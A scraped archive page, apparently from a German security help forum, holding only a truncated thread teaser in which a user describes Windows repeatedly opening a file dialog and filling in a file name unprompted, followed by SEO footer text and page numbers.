Zum Thema Windows entwickelt merkwürdiges Eigenleben - Hallo, neuerdings passiert bei mir folgendes: Zyklisch öffnet der PC unter dem gerade laufendem Programm (z.B. Acrobat Reader) "Datei öffnen" und trägt folgendes als zu öffnenden Dateinamen selbstständig ein : - Windows entwickelt merkwürdiges Eigenleben...
Archiv
Du betrachtest: Windows entwickelt merkwürdiges Eigenleben auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54